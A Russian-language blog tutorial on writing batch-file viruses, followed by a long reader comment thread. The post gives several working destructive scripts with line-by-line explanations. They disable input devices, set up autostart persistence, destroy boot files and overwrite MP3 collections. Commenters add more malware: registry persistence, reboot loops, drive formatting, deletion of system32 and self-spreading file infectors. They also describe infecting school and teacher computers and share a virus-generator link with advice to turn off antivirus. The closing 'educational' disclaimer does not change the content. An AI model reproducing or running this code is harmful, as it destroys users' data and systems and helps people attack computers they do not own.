Познавательный блог  

Поиск по сайту

Страницы

Гугль

Архивы

BAT-вирус своими руками

Привет тебе снова, юный кодер-шкодер. Если ты читал прошлую мою статью под названием "Учим ДОС", то ничего сложного тут для тебя не будет. А если не читал, то внимательно смотри комментарии. Итак, начнем. Сижу я однажды и думаю: а не накатать ли мне вирус? А так как кроме QБарсика я ничего не знал, а ДОС был моим вторым ... [Братом], а ты что подумал извращенец? :)~. ТО я решил писать вирус на нем, и оказалось это не так трудно.

Вот тело моего первого вируса

@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls

Объясняю популярно и по шагам:

1 @echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт.
2 rundll32 keyboard,disable - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
3 rundll32 mouse,disable - Отключаем мышь тоже на всякий.
4 copy %0 %windir%/system - Копируемся в папку windows/system
// %0 - Переменная, указывающая на исходный файл-вирус
// %windir% - переменная папка масдая.
5 echo run=%windir%/system/*.bat >> %windir%\win.ini - Добавляет текст "run=%windir%/system/*.bat" в файл win.ini
6 echo run=%windir%/system/*.bat >> %windir%\system.ini - Добавляет текст "run=%windir%/system/*.bat" в файл system.ini
7 label LOHOLAMMER - Меняет имя диску c:\ на "LOHOLAMMER"
8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r - Проверяем если есть файл c:\autoexec.bat то убираем
//у него атрибуты -h -s -a -r
9 deltree /y c:\autoexec.bat - Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.
10 echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat - Добавить текст "YOU ARE LAMMER...xe-xe-xe"
//в новый файл autoexec.bat
11 rundll32 mouse,enable - Включаем, пускай думает, что ниче не было.
12 rundll32 keyboard,enable - Включаем, пускай думает, что ниче не было.
13 echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью
deltree /y %temp%\mes.js //А потом стирает за собой следы.
14 attrib c:\autoexec.bat +h +s +a +r - Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.
15 pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)
16 cls - Выходим

Эта программа, при следующей перезагрузке не даст загрузиться виндовсу и будет писать 'Вы ламер.' .Работает только в винде до 2000.

Идем дальше, пишем новый вирус. Те функции, которые были упомянуты уже, не будут объясняться заново. Это просто усовершенствованная версия прошлого вируса.

@echo off
rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол
rundll32 keyboard,disable //Было
rundll32 mouse,disable //Было
rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши
echo Обновление параметров системы, пожалуйста подождите... //пишет отмазку :)
label mp_k //Меняем имя диску
copy mp_k.exe %windir% //Копирует себя в папку windows
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat
if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER....[]=[_H@CKED_BY_[kas]*_"SmallPox_Vir_Org"_] > c:\autoexec.bat
echo run = %windir%\mp_k.exe >> %windir%\win.ini
echo run = %windir%\mp_k.exe >> %windir%\system.ini
echo [AutoRun] > c:\autorun.inf //Эти операции есть в прошлом вирусе.
echo open=c:\autoexec.bat > c:\autorun.inf
echo [AutoRun] > d:\autorun.inf
echo open=c:\autoexec.bat > d:\autorun.inf
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. А теперь необходимо перезагрузиться"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
attrib %windir%\mp_k.exe +h +s +a +r
attrib c:\autorun.inf +h +s +a +r
attrib d:\autorun.inf +h +s +a +r
deltree /y mp_k.exe
rmdir %windir%\temp //Удаляем папку temp
mkdir %windir%\temp //Создаем папку temp
cls

А теперь, что-то новое.

@echo off
cls
echo Please wait, updating system...
ctty nul. //Это новая команда, она отключает вывод текста в окошке.
exist %WINDIR%\SYSTEM\VMM32\%0 goto :end //Если вирь уже запускался то пусть запустит себя снова.
copy %0 %WINDIR%\SYSTEM\VMM32
cd c:\ //Переходим в другую директорию
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd d:\
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Тут тоже самое.
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
:end //Метка
start /m /w %WINDIR%\SYSTEM\VMM32\%0 //Запуск в свернутом режиме
ctty con //Врубаем разрешение на показ текста в окне
echo Say goodbye your MP3 collection :)) Virus [BAT.kas.a] //Прощальные строки
cls //Выход.

Тут мало нового но уже что-то. Идем дальше. Накачал я с инета BAT-вирусов и начал их исследовать. И вот результаты:
Написал еще пару своих:

ctty nul //Было такое
REM Чй† Ђь@uoњPSQRVW
?
‹тЌ
" Q_ь№ у¦u=
є №є њъ.я?ђ л,ђ ///
copy %0 *.exe ///
copy %0 b.com>nul // Эта технология взята с вируса другово.
b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.
del b.com. /// Это текст АСМ скомпиленого в exe
rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ' ‰?ђ Ќ ё.%Н.Ќ є Н'ђђ //
@echo off //
echo XEP_BAM //Пишем злобно и красиво.
if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен.
@rundll32 user,setcursorpos
ctty con //Было такое
echo Обновление параметров системы, пожалуйста подождите... //Отвлекаем.
@label BAT.c
copy %0.bat %windir% > nul
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
deltree /y c:\autoexec.bat
deltree /y c:\boot.ini
if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\autoexec.bat
if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\boot.ini //Это для XP он там вместо autoexec.bat ;)
deltree /y %windir%/win.ini

copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys
echo [AutoRun] > c:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo [AutoRun] > d:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo [AutoRun] > e:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход

О какие бывают вирусы. И на что только ни ухитряются вирусописатели, чтобы добиться нужного результата. Прочитав эту доку ты с уверенностью сможешь сам написать BAT вирус, даже лучше моего ;).Ну удачи тебе в написании вирей, а я отклонюсь и свалю пить пиво %-).

Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.

Комментарии

Комментарий от neuda4nik [ Июнь 13, 2008, 00:01 ]

поясни плиз ещё раз , а то 3 раза читаю и ничего не понял до сих пор.(((

Комментарий от Dos_Atacker [ Июнь 29, 2008, 09:39 ]

А чеж тута непонятного создаеш текстовый файл, добавляеш чюбой из этих кодов, ставиш файлу расширение .bat и запускаеш.

Комментарий от Ну я, и что??? [ Июль 18, 2008, 12:51 ]

Слушай, ништяк братишка, пишешь! Только в следующий раз, если не сложно, пояснения выделяй! А так, отлично проделаная работа! Даже несколько команд для себя нашел =)

Комментарий от Лёха [ Август 3, 2008, 00:29 ]

Хорошая статья.Всё понятно написано.А есть команда, чтоб вирус запускался в определённое время и дату?Напиши плиз в e-mail.

Комментарий от влад [ Август 26, 2008, 16:53 ]

ПРИКИНЬТЕ ДА Я ВСЁ ПОНЯЛ ПРОСТО МОИ ДРУЗЬЯ КОПИРУЙТЕ ЧТО ВАМ НАПИСАЛИ В БЛОКНОТ ПОТОМ СОХРАНЯЙТЕ ЭТО ВСЁ ПОТОМ заходите мой компьютер сервис свойство папки типы файлов и ищем гдето внизу файл txt нажимаем жмёи дополнительно там где сверху написано txt мы это стираем и пишем по английски .BAT !!!!!!1потом ставим галку на всегда отображать расширение (2 снизу) потом заходим в тот файл который вы написали в блокноте потом жмём свойства потом меняем имя фала там стоит txt а иы меняем на .BAT тоесть пишем имя вот пример ВИРУС.BAT потом сохраняем !!!!потом там меняеться картинка того файла мы жмём свойства и смотрим если там стоит ЕСЛИ ТАМ СТОИТ ПАКЕТНЫЙ ФАЙЛ MS-DOS То вирус готов всем спосибо за внимание ах да ещё не открывайте его !!!!!!ЕСЛИ ЕСТЬ ВОПРОСЫ ПИШИТЕ МНЕ В АСЮ 378876755

Комментарий от 432342 [ Октябрь 10, 2008, 19:01 ]

Хорошая статья.Всё понятно написано.А есть команда, чтоб вирус запускался в каждый
месяцев на дату Напиши плиз в e-mail.

Комментарий от kas [ Октябрь 11, 2008, 08:59 ]

Писать вирусы не хорошо. =) Лучше пиши программы, на них хоть денег заработать можно. А вирусы тока вред приносят.

Комментарий от Romzes [ Декабрь 9, 2008, 06:30 ]

) Да-уж…… ну вот вам ещй один в копилку знаний написал за 10 минут

@echo off

echo Windows Registry Editor Version 5.00 > %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %temp%\run.reg
echo «svchost.exe»=»Buldozer.bat» >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents] >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL] >> %temp%\run.reg
echo «Installed»=»1″ >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI] >> %temp%\run.reg
echo «Installed»=»1″ >> %temp%\run.reg
echo «NoChange»=»1″ >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS] >> %temp%\run.reg
echo «Installed»=»1″ >> %temp%\run.reg

regedit /s %temp%\run.reg

del %temp%\run.reg

echo @echo off > %windir%\system32\Buldozer.bat%
>> %windir%\system32\Buldozer.bat%
echo Shutdown -r >> %windir%\system32\Buldozer.bat%

attrib +H %windir%\system32\Buldozer.bat

echo var WSHShell = WScript.CreateObject(«WScript.Shell»); > %temp%\mes.js
echo WSHShell.Popup(«теперь питание компьютера можно выключить»); >> %temp%\mes.js
start %temp%\mes.js

Работает через реестр , а это уже что-то новое для автора а может и нет ))

если что пишите…….. 2920636

Комментарий от Ди2 [ Декабрь 25, 2008, 19:56 ]

rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ‘ ‰?ђ Ќ ё.%Н.Ќ є Н’ђђ //

ЧТО ЭТИ КАРАКУЛИ ДЕЛАЮТ?

Комментарий от vi-rus [ Февраль 22, 2009, 13:31 ]

а как вылечица то от этого вируса???

Комментарий от Виктор [ Март 31, 2009, 18:44 ]

Огромное спасибо этому человеку.О-о-о-очень,очень
интересная работа.Пойду изучать!

Комментарий от Ромик [ Июнь 15, 2009, 22:09 ]

Может кто подскажет как это запихнуть через сеть в автозагрузку незаметно и как потом лечить.

Комментарий от DEMOH [ Сентябрь 7, 2009, 18:35 ]

rundll32 keyboard,disable
и
rundll32 keyboard,enable

не пашут!

Комментарий от NumeN [ Октябрь 10, 2009, 18:31 ]

ваще гениально — я паш в програмировании паскаля малеха, а вот в скриптовых пока никак…. тока вот я не понял, сам еффект от 2-го кода…

Комментарий от Vahik [ Октябрь 14, 2009, 17:52 ]

Если кто может напишет в e-mail все операторы и иx значения. Очень нужно узнать.
HELP!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Комментарий от Artem(нач. хакер_) [ Октябрь 27, 2009, 18:45 ]

Пришлите мне на artemkarm@mail.ru
Все операторы .bat файла!!!
Пожайлуста!

Комментарий от microteam [ Ноябрь 7, 2009, 22:29 ]

Да я тоже так чуть чуть в досе шарю можно сделать чтоб вирус кексу безконца комп перезагружал!!! вот строки
@echo off
title windows update
reg add «hkcu\software\microsoft\windows\CurrentVersion\run» /v Virus /t reg_sz /d %windir%\*.bat
copy %0 %windir%
shutdown.exe -r- -f -t 00 -c «Яйца лысого коня»
cls
exit

Комментарий от sergey [ Ноябрь 11, 2009, 21:48 ]

стaтья сyпep.пpишлитe нa мыло вce кoмaнды bat-фaйлoв,плиз.sergei-pit_bull@mail.ru

Комментарий от NEoM@STER [ Ноябрь 13, 2009, 21:29 ]

пишем
@echo off
Chcp 1251 >nul
shutdown /r /t 20 /c «Ну ты и лошара» >nul
assoc .*=.мразь

Комментарий от Андрей [ Ноябрь 21, 2009, 20:40 ]

а что это

@echo off

Chcp 1251 >nul

shutdown /r /t 20 /c «Ну ты и лошара» >nul

assoc .*=.мразь

Комментарий от pik[neac] [ Ноябрь 23, 2009, 14:40 ]

ЛЮДИ!!!!ХЭЛП!!!! я решил загадить компьютеры учителям в школе,написал вирь,скинул на рабочий стол учителя!НО они его не открывают!!!!!есть какое то решение моей проблемы или нет????ответы оставляйте в комментах или на мыло! заранее СПС

Комментарий от Руслан [ Ноябрь 23, 2009, 20:05 ]

закинь в автозагрузку в ручную

Комментарий от pik[neac] [ Ноябрь 24, 2009, 15:22 ]

1 Что будет если я его в авто загрузку закину?
2 Где она находится???

Комментарий от Илларионов [ Ноябрь 27, 2009, 23:00 ]

pik[neac], автозагрузка находится сдесЬ: Пуск/Программы/Автозагрузка

Комментарий от kuler [ Декабрь 1, 2009, 01:02 ]

Люди извините вам делать нехуй???
Выучите хотябы Delphi 8, бля просто я пропалил какие вы здесь код используете я чуть со-стула не упал))),Учите Ассемблер,C++,Java,тогда вы напишите что-то похожее на ВИРУС!!!!!!!!

Комментарий от levinter [ Декабрь 9, 2009, 22:23 ]

конечно круто))) а специально для килера такие как он говорит тока так видит даже самый галимый анти вир а с помощью дос хуй там невидит неодин…ваще если забацать хорошо етот ДОс вир то он как систем фаил идет и хер ти его найдеш ,а бывает и неудалиш

Комментарий от Derbian [ Декабрь 20, 2009, 10:09 ]

А можно это как-то вконтакте кинуть, ссылку типо?

Комментарий от Рома [ Декабрь 27, 2009, 21:07 ]

Плизз моля помогите как писать сам бат как вы пишите вот эти комбинации и получается вир как писать такие комбинации плиз киньте на мыло:zaikaodnoyaika@mai.ru

Комментарий от Рома [ Декабрь 27, 2009, 21:08 ]

И кто знает вконте можно кого-нибудь заразить вир и как?

Комментарий от Влад [ Декабрь 31, 2009, 06:17 ]

скажите команду для перезагрузки компа ы выкл

Комментарий от GRO88 [ Январь 4, 2010, 00:04 ]

Влад перезагрузка «shutdown -r» выключение «sutdown -s» если в конце еще написать «-t 0″ то сразу

Комментарий от Ветал [ Январь 4, 2010, 21:49 ]

Статья не очень, многие команды уже палятся каспером
(например отключение клавы и мышки)

Комментарий от levinter [ Январь 4, 2010, 22:09 ]

так ну в контакт ето врядли…… ну помню одно .. незнаю получится такое с бат вирем или нет ну попробывать мона…. если аккуратно взломать страничку (ну если вы знаете другой способ редактировать коды страницы то пожалуста)бирем находим (не помню тосно как она выглядит…) команду кнопки (неимеет значение какой ну например просмотр фото) и пишим в ету кнопку вместо команды сам текст виря …. ну не отвечаю что получится но с писмами проходит ета фигня…. а да еще нюан помойму два языка програмирования низя в одной проги писать ну тогда делаем так… заносим какимнибудь макаром бат вирь в контакт типо в мои файлы (или че там за вкладки) а вместо кнопки пишем команду <> fail_Virko.bat ну или както так непомню точно команду ету…так чето еще забыл …. а если че потом добавлю….Shutdown -t 0 –s -Эта команда выключает компютер …. а если решил написать свой вирь на бесконечный перезапуск то нафиг его уже придумали…… вот кстати если хотите поугарать над кемнибудь вот так можно
@echo off
echo pizda ckompy а выведет текст хороший на икран
label eban переименуем можно конечно так чтоб вместо С:\ писало ченить другое ну впадло писать
assoc *.* loh.eblanko все файлы терь вот под таким название и таком формате …гыгы
cd C:\ перейдем в католого С
del sys.* а ето все ради прикола после етого ни мыш ни клава не запустятся
del *.sys ну непомню сус ето формат или имя так что чтоб навернека

Комментарий от levinter [ Январь 6, 2010, 21:40 ]

мдя ну ти витал и лох….. даже добавить нечего….во первых эти команды палятся уже давно так как ета команда в основном в червях используется…. ну если хакер не ламер то можно сначала удалить касперского на такой случай… а да еще гдето видел такое помоему в макро вирусе команду против обноружения антивирусом….

Комментарий от FaPToBbIu [ Январь 8, 2010, 11:00 ]

Люди а вы 3наете что можно обойтись и 5-ими строчками чтобы сломать всю систему)))

Комментарий от morgan [ Январь 10, 2010, 11:02 ]

ну и где твои 5 строчек просвяти народ епт)))

Комментарий от levinter [ Январь 10, 2010, 19:21 ]

тока винд сломать можно

Комментарий от Серж [ Январь 14, 2010, 00:09 ]

Ребят, конечно все красиво, но зачем все так усложнять? Зачем писать такой большой код? Посмотрел я все изложенные тут вирусы и убедился, что их результат работы — прекращение стабильной загрузки Windows, но зачем такой большой код, если для этого достаточно удалить всего один 1 файл? В корневом катологе загрузочного диска удаляете файл скрытый файл ntldr простой командой del… и все…

Комментарий от vovfka [ Январь 14, 2010, 14:36 ]

кто знает какую команду в батнике прописать что бы выполняемый батник не выводил окно доса.
я нашел ток через скрипт типа файл *.vbs с текстом
Dim Shell

set Shell = CreateObject(«WScript.Shell»)

Shell.run «start.bat»,0,1

Set Shell= Nothing

запукает батник start.bat скрыто.

Комментарий от levinter [ Январь 14, 2010, 15:35 ]

ну и лол смотри
@fomat C:\ /q
вот и все нуб

Комментарий от Mila [ Январь 15, 2010, 08:07 ]

ВСЕ — ТУПОЙ, БЕСМЫССЛЕННЫЙ БРЕД. дс — какой то.

Комментарий от levinter [ Январь 15, 2010, 20:07 ]

vovfka запуск в свернутом режиметут гдето был написан глянь внимательно ктото уже писал

Комментарий от Лёша [ Январь 16, 2010, 00:58 ]

Блять я етот вирус на себе запустил и нифига =(

Комментарий от levinter [ Январь 16, 2010, 22:00 ]

давай я вирь напишу охуееш…. тут просто есть удаленые модули поетому

Комментарий от женя [ Январь 21, 2010, 00:00 ]

я долго ржал над другом

Комментарий от xaker [ Январь 24, 2010, 20:24 ]

здорова чуваки. я в школе все компы заразил этой хуйнёй,мой вирь
запускается раз в 4 дня и заражает файлы почти всех форматов.Вот код для заражения:jpg,gif,mp3,midi,bat,ini,rar….короче что хотите.

@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb»c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (..*.jpg ..*.doc ..*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
там где написаны форматы можно написать любые форматы какие хочеш

Комментарий от levinter [ Январь 26, 2010, 19:21 ]

мдяяяяяяя вот зачем ета строка «MrWeb»c:MrWeb.bat оператор find означает поиск
и рас в 4 дня он не запустится… потом еще если висать куда нить %2 то просто сам себя запустит а не сам вирь вить дос не знает что имели ввиду програму которая суда ето вписала

Комментарий от Gol [ Январь 27, 2010, 22:50 ]

Вирус должен заражать, а не портить код жертвы. гуглите конструктор bat вирусов «BVGMIX» — он создает настоящие bat вирусы. Например:
—————————
@echo off%[ViRuS]%
set ViRuSorX=*.ba
if ‘%1==’vnPY goto ViRuSKIQk
if ‘%1==’uBwOLNA goto ViRuSAAy
if exist c:\ViRuS.bat goto ViRuSkxQs
if not exist %0 goto ViRuSGcy
find «ViRuS»c:\ViRuS.bat
attrib +h c:\ViRuS.bat
:ViRuSkxQs
for %%q in (.) do call c:\ViRuS.bat uBwOLNA %%~sq
goto ViRuSGcy
:ViRuSAAy
for %%S in (%2\%ViRuSorX%t) do call c:\ViRuS.bat vnPY %%~sS
goto ViRuSGcy
:ViRuSKIQk
find «ViRuS»nul
if not errorlevel 1 goto ViRuSGcy
echo.>>%2%[ViRuS]%
type c:\ViRuS.bat>>%2
:ViRuSGcy
————————-

Комментарий от rich [ Январь 28, 2010, 10:39 ]

мля!!!самый простой вирь!!
rd /s/q D:\WINDOWS\system32
копируем его дядьке преподу его в автозагр. и все!!этого достаточно!!

Комментарий от Колян [ Январь 29, 2010, 23:08 ]

Привет всем.Люди напишите кто нибудь код чтоб вирус запускался сам в заданное время или дату,а то я такой вирусяку забабахал просто охереть можно,
напишите кто нибудь плиззззззз,а то пиздец как надо.

Комментарий от romka747 [ Январь 31, 2010, 15:37 ]

генератор вирусов кузя http://depositfiles.com/files/1qbgf1boj

Комментарий от romka747 [ Январь 31, 2010, 16:36 ]

генератор просто супер тока перед скачиванием отключите антивиры !!!

Комментарий от Саня [ Февраль 1, 2010, 17:26 ]

люди напишите кто нибудь код чтоб вирус сам запускался в заданное время или дату.очень надо!!!!!!!!

Комментарий от ыыы [ Февраль 5, 2010, 20:57 ]

а может кто нить подсказать как избавиться от этого ?? а то я лох запустил терь незнаю что делать!!! помогите плиз ася вот 485565809

Комментарий от JuseS [ Февраль 6, 2010, 01:23 ]

[red][blink]Хуйня это всё:)гггг[/blink][/red] [green][blink]Пишите на мыло, кому нужен bat вирусы… напишу любой![/blink][/green]

Комментарий от JuseS [ Февраль 6, 2010, 01:24 ]

аааааа сук…. не работает тут…. мля….

Комментарий от Антивирь [ Февраль 8, 2010, 09:30 ]

Ну да, отключим антивирь и твой вирь попадет в нашу систему, отлично придумал :)

Комментарий от zarj [ Февраль 9, 2010, 16:06 ]

кто может взломать счасливий фермер вконтакте прошу подскажите!

Комментарий от vlad [ Февраль 10, 2010, 21:20 ]

pik[neac] поменяй файле иконку например как в папке!!

Комментарий от Nickers [ Май 15, 2010, 11:43 ]

JuseS +1 но для начала норм (поучится) даж нахожу для себя новым и интересным ^^

Когда наткнулся на статейку редактировал свой тупой вирус^^:

reg add «hkcu\software\microsoft\windows\currentVersion\run» /v DieInTheHell /t reg_sz /d «C:\temp\Mozilla\ByNickers.bat»
cd C:\temp
md Mozilla
cd C:\temp\Mozilla //Не знаю почему но с %temp% накладка Т Т
echo shutdown -s -f >>ByNickers.bat
attrib ByNickers.bat +h
shutdown -p -f

еще не тестил…

Комментарий от JoJo [ Июль 26, 2010, 14:34 ]

Как правильно указать путь к файлу
c:\Program Files\ХРЕН\Application\*.ехе
пробовал
c:\Progra~1\ХРЕН\Applic~1\*.exe
Ругается на руский шрифт папки.

Комментарий от Green [ Июль 28, 2010, 10:06 ]

Обращайте внимание под какую Винду это пишется, под Вистой и 7 некоторые команды не робят, а так, спасиб автору, понятно и доходчиво.

Комментарий от Вова [ Август 6, 2010, 20:14 ]

А когда мышь отключаешь она после перезагрузки работать будет?

Комментарий от Slava [ Август 19, 2010, 11:29 ]

А вот простейшый вирус
@echo
time 12:00
date 01/09/2010

Комментарий от Device [ Август 25, 2010, 10:01 ]

вот поеснения команд
assoc .exe=.mp3-Ексешники запускаются как музыка label E: pridurok-меняется винт на придурок time 00:00 -менять время
date 13.03.36-менять дату assoc .lnk=.txt-меняют ярлэчки в тхт файл copy %0 F:\Work.bat-копирование обьекта
«net user «х» /add» — добавит на компьютер пользователя под именем х (пример net user «Smoked» /add);
1) Программа для удаления файлов с флешки (если та вставлена) и переименования ее.
del F:\ *.* /q
label F:HACK
2) Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку.
time 14:13
date 11.07.12
copy %0 C:\Time.bat
copy %0 F:\Time.bat
——————————
>nul-скрывать строку команду
%SystemRoot%/system32/rundll32 user32, SwapMouseButton-меняет местами клавиши мыши
——————————————-
copy «»%0″» «%SystemRoot%\system32\File.bat»
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File.bat» /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Очень жестокая команда: добавляет программу в автозагрузку ОС.
«del x:\y *.* /q» — удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q);
«net user «х» /add» — добавит на компьютер пользователя под именем х (пример net user «Smoked» /add);
«@echo off» вводиться в начале нашего вируса и скрывает все
rundll32 user,disableoemlayer — сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
del *.* /q ( после запуска этой команды все файлы кроме папок которые были в той папке где был запущен вирус удалатся!!!
md 1-создания папок
Для запуска файла во время загрузки Windows, переименуйте файл в Autoexec.bat
Echo Virus Loading-надпись на экран вирус лодин
del c:Program Files/q (удаляет все файлы из этой папки)
reg — непосредственная работа с реестром. Смотреть reg /? всем!
rcp — обмен файлами через rcp в ascii
runas — от имени пользователя
tasklist — отображает приложения и сеансы, связанные с ним.
taskkill — позволяет завершить один или несколько процессов
tftp — trivial ftp
tskill — убить процесс
reg — утилита взаимодействия с реестром
bootcfg — настройка boot.ini
append — позволяет открывать удаленные файлы так, словно они находятся в текущем.
getmac — получить мас
logoff — Заверщить пользовательский сеанс.
mem — вывод на экран сведений о текущих процессах в ОЗУ
mqbkup — архивирование
netsh — ??
openfiles — просмотреть открытые файлы.
rsh — выполнение команд на удаленных узлах с запущеной rsh
sc — command line ??
rexec — выполнение команд на удаленных узлах с запущеной rexec
shutdown — выключить (хе-хе) local or remote computer.
systeminfo — вывод инфы о компе.
schtasks — планировщик заданий.
xcopy — копирование файлов и каталогов.
tsshutdn — завершение работы сервера в установленом порядке.
set — вывод, задание и удаление переменных среды cmd.exe. Свойства системы (пр.кн.”мой комп”) — дополнительно — Переменные среды. Там не все переменные, но много! Все смотреть просто set.
